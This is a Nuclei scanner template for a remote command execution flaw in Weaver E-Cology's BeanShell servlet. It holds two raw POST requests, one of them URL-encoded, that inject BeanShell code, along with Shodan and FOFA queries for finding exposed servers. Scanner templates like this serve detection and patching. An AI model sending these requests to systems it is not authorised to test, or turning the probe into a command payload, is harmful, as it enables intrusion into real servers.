46 lines
1.4 KiB
YAML
Executable File
46 lines
1.4 KiB
YAML
Executable File
id: weaver-ecology-bshservlet-rce
|
|
|
|
info:
|
|
name: Weaver E-Cology BeanShell - Remote Command Execution
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
|
|
classification:
|
|
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: weaver
|
|
product: e-cology
|
|
shodan-query: ecology_JSessionid
|
|
fofa-query: app="泛微-协同办公OA"
|
|
tags: beanshell,rce,weaver
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
bsh.script=print%28%22{{randstr}}%22%29%3B
|
|
- |
|
|
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "BeanShell Test Servlet"
|
|
- "(?i)<pre>(\n.*){{randstr}}"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100958523c3e8a809bd453ca0e38d2996e8d21f775f6fd462beb1c01378ce4555da02210080830614cf091d2944e7d98aa17cbe889a21692e84656680f570b9aa2367092e:922c64590222798bb761d5b6d8e72950 |